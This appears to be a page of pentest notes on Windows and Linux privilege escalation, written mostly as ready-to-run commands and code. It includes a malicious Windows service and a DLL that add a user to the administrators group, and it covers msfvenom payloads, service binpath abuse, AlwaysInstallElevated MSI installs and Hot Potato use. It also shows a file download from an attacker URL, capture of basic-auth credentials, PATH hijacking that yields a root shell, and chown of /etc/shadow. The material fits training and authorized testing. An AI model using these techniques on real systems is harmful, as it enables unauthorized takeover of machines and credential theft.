Privilege Escalation

boot -> root

Windows

The use of SysInternals is recommended but not necessary. It can be very useful when doing pentests but not so very for very obvious reasons. A simple signature check on the file and any AV/IDS will start flip floppin. https://docs.microsoft.com/en-us/sysinternals/ https://github.com/Sysinternals/sysinternals

PowerShell

Download file

Invoke-WebRequest -OutFile peas -Uri http://<attacker-url>/PEAS

AutoRun

Search for autoruns and check if you have WRITE permissions on it. If you do have WRITE, simply replace it with your payload. Of course, if the software is somewhat "important", the user could then notice that something is not quite right. 

sysinternals/autoruns64.exe
sysinternals/accesschk64.exe -wvu "C:\Program Files\Autorun Program"

AlwaysInstallElevated

Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. These MSI packages can be installed with elevated privileges for non-admin users

Check if AlwaysInstallElevated registry key value 1. If so, simply craft a malicious .MSI package containing your payload and literally install it on the machine

reg query HKLM\Software\Policies\Microsoft\Windows\Installer #LocalMachine
reg query HKCU\Software\Policies\Microsoft\Windows\Installer #CurrentUser

You can now copy the payload onto the victim's pc and run it.

msiexec /quiet /qn /i C:\Temp\payload.msi

Registry

With PowerShell check for registry services

Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

The following is a simple C service for windows. You can tweak it a bit to get desired results. Then you can compile it with x86_64-w64-mingw32-gcc or any appropriate compiler for the current situation.

#include <windows.h>
#include <stdio.h>
#define SLEEP_TIME 5000
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;
void ServiceMain(int argc, char** argv);
void ControlHandler(DWORD request);

int Run() 
{ 
    system("cmd.exe /k net localgroup administrators user /add");
    return 0; 
} 

int main() 
{ 
    SERVICE_TABLE_ENTRY ServiceTable[2];
    ServiceTable[0].lpServiceName = ThiccService";
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;
 
    StartServiceCtrlDispatcher(ServiceTable);  
    return 0;
}

void ServiceMain(int argc, char** argv) 
{ 
    ServiceStatus.dwServiceType        = SERVICE_WIN32; 
    ServiceStatus.dwCurrentState       = SERVICE_START_PENDING; 
    ServiceStatus.dwControlsAccepted   = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
    ServiceStatus.dwWin32ExitCode      = 0; 
    ServiceStatus.dwServiceSpecificExitCode = 0; 
    ServiceStatus.dwCheckPoint         = 0; 
    ServiceStatus.dwWaitHint           = 0; 
 
    hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler); 
    Run(); 
    
    ServiceStatus.dwCurrentState = SERVICE_RUNNING; 
    SetServiceStatus (hStatus, &ServiceStatus);
 
    while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
    {
		Sleep(SLEEP_TIME);
    }
    return; 
}

void ControlHandler(DWORD request) 
{ 
    switch(request) 
    { 
        case SERVICE_CONTROL_STOP: 
			ServiceStatus.dwWin32ExitCode = 0; 
            ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
            SetServiceStatus (hStatus, &ServiceStatus);
            return; 
 
        case SERVICE_CONTROL_SHUTDOWN: 
            ServiceStatus.dwWin32ExitCode = 0; 
            ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
            SetServiceStatus (hStatus, &ServiceStatus);
            return; 
        
        default:
            break;
    } 
    SetServiceStatus (hStatus,  &ServiceStatus);
    return; 
}

You can now add the new service path to the registry

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\payload.exe /f

Executable files

Check if executable has weak or misconfigured permissions. If you have FILE ALL ACCESS, you can copy your payload over the service/executable and execute it.

sysinternals/accesschk64.exe -wvu "C:\Program Files\weakperms.exe"

Startup

In a command prompt, check for startup applications. Check if BUILTIN/Users or any compromised user with (F) which means FULL permissions. If such thing occur, you can, again, overwrite said startup executable for your own payload and wait for admin (or any other user) to login.

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

DLL Hijack

If SafeDllSearchMode is enabled, the search order is as follows:

  1. The directory from which the application loaded.

  2. The system directory. Use the GetSystemDirectory function to get the path of this directory.

  3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.

  4. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.

  5. The current directory.

  6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.

If SafeDllSearchMode is disabled, the search order is as follows:

  1. The directory from which the application loaded.

  2. The current directory.

  3. The system directory. Use the GetSystemDirectory function to get the path of this directory.

  4. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.

  5. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.

  6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.

  1. DLL replacement: replace a legitimate DLL with an evil DLL.

    1. DLL PROXYING: Keep original DLL functionalities. https://kevinalmansa.github.io/application%20security/DLL-Proxying/

  2. DLL search order hijacking: Hijacking the search order takes place by putting the evil DLL in a location that is searched in before the actual DLL.

  3. Phantom DLL hijacking: drop an evil DLL in place of a missing/non-existing DLL

  4. DLL redirection: change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable, or .exe.manifest / .exe.local files to include the folder containing the evil DLL.

  5. WinSxS DLL replacement: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often referred to as DLL side-loading.

  6. Relative path DLL Hijacking: copy (and optionally rename) the legitimate application to a user-writeable folder, alongside the evil DLL. In the way this is used, it has similarities with (Signed) Binary Proxy Execution. A variation of this is ‘bring your own LOLBIN in which the legitimate application is brought with the evil DLL (rather than copied from the legitimate location on the victim’s machine).

Find missing DLLs

Custom Dlls

#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    switch(dwReason){
        case DLL_PROCESS_ATTACH:
            system("whoami > C:\\temp\\whoami.lol");
            WinExec("calc.exe", 0); //no redirect like system
            break;
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

BinPath

sysinternals/accesschk64.exe -wuvc daclsvc

If you see SERVICE_CHANGE_CONFIG, you can exploit this like so

sc config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc

Unquoted Path

A classic if you ask me. If the path to an executable is not inside quotes, Windows will try to execute every ending before a space. E.g: C:\Program Files\Some Folder\Service.exe Windows will try:

C:\Program.exe 
C:\Program Files\Some.exe 
C:\Program Files\Some Folder\Service.exe
sc qc unquotedsvc #specific bin

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ #List all services
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v """ #Not only auto services

Craft a payload with msfvenom for POC

msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o malicious.exe

Now copy this payload into the unquoted path, E.G:

Imagine the vulnerable service path as follow:

C:\Program Files\Some Folder\Service.exe You could copy your malicious payload here: C:\Program Files\Service.exe

Password Mining

  • C:\Windows\Panther\Unattend.xml

HTTP_BASIC Memory

msf
use auxiliary/server/capture/http_basic
set uripath x
run

On victim's machine browse to http://your_ip]/x and dump iexplore.exe memory using taskmgr or any appropriate tool. Copy said dump to your box and run strings against the memory dump. You should be able to grep/find the Authorization: Basic header holding the base64 encoded password.

Potatoes

Hot potato

powershell.exe -nop -ep bypass
Import-Module tater.ps1
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

KERNEL

One quick and dirty way to find common vulnerabilities in the kernel is obtain a meterpreter shell and call the post exploitation module local_exploit_suggester.

Linux

Gimme the root !

Sudo group - PKEXEC

If the user you are impersonating is a member of the Sudo group, pkexec allows an authorized user to execute commands as another user. Therefore, we could usepkexec /bin/bash to spawn a shell as root. However, there is known issue that “pkexec fails in a non-graphical environment. To solve this, we needed to create two SSH connections as the user you have access to

The process:

  • Opened two SSH connections as user Alice

  • On the first SSH session:

echo $$ #get session pid

  • On the second session (replace {pid} with output of earlier command)

pkttyagent -p {pid}

  • On the first session:

pkexec /bin/bash

  • On the second session, entered the password for Alice

Any sudo?

check if you're allowed to execute some stuff as sudo

sudo -l

Find user's files

find / -user www-data -type f 2>&1 | grep -v "Permission" | grep -v "No such"

CVE-2021-3156 - Sudo HEAP Overflow

Check if the box is vulnerable by running:

$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')

If vulnerable, console will show:

https://github.com/TurboWindX/CVE-2021-3156

https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit https://github.com/lockedbyte/CVE-Exploits/tree/master/CVE-2021-3156

SUID

If a script on the machine has the SUID bit set, it might be possible to exploit it.

find / -perm -u=s -type f 2>/dev/null

Crontab

Check for any misconfigured scripts 

cat /etc/crontab

Environment variables

If a script is using another binaries (like cp in example below) and it doesn't specify the FULL path, you might be able to hijack this by creating your own binary and exporting the PATH yourself.

Let say you find this script which creates a backup of certain files on the system.

cp /home/user/archangel/myfiles/* /opt/backupfiles

You could exploit it by creating your own version of cp. Which of course will be a shell running as root.

echo '/bin/bash' > some_bin
chmod +x some_bin
export PATH=.:$PATH
cat > some_bin << EOF
> #!/bin/bash
> /bin/bash -i
> EOF

chmod +x some_bin
export PATH=.:$PATH

Linux Capabilities

CAP_CHOWN

Lets suppose the python binary has this capability, you can change the owner of the shadow file, change root password, and escalate privileges:

python -c 'import os;os.chown("/etc/shadow",1000,1000)'

Or with the ruby binary having this capability:

ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
PreviousContainer/Sandbox BreakoutNextHashing & Cracking

Last updated